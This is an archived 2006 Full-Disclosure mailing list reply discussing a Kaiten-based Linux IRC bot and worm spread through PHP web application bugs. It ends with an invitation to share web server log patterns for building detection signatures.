lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <43FA1F68.9060506@linuxbox.org>
Date: Mon, 20 Feb 2006 21:58:32 +0200
From: Gadi Evron <ge@...uxbox.org>
To: Marco Monicelli <marco.monicelli@...cegaglia.com>
Cc: "full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>,
	bugtraq@...urityfocus.com
Subject: Re: new linux malware


Marco Monicelli wrote:
> Dear Gadi,
> 
> this malware looks like the famous Kaiten IRC bot. If you want, I can send
> the source code of it but it is already known by most of AVs and I think
> the source is public nowadays. This must be just another variant and
> bytheway it's detected as far as I can see from your quoted informations so
> it shouldn't be dangerous.

Indeed, it has become an annoying trend everybody talks about but nobody 
writes about. Trojan horses, worms, etc. exploiting PHP bugs. Either 
vulnerabilities in know applications such as WordPress, PHPBB, Drupal, 
etc. or actually trying different permutations to attack the site.

Many of these are indeed based on the old kaiten code. As someone 
mentioned previously in this thread or another, it can even be found on 
packet storm.

Still, this one has a kick in the second payload with a worm that also 
attacks other systems and I can say is not just yet another PHP worm, 
but actually what I'd call linux malware.

Anyone else seeing their web server logs going crazy with new patterns 
every day? Email me, I am starting a sharing system where these can be 
shared mutually so we can better protect ourselves, create signatures, etc.

> 
> Anyway, tnx for keeping us updated!

:)

	Gadi.

-- 
http://blogs.securiteam.com/

"Out of the box is where I live".
	-- Cara "Starbuck" Thrace, Battlestar Galactica.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ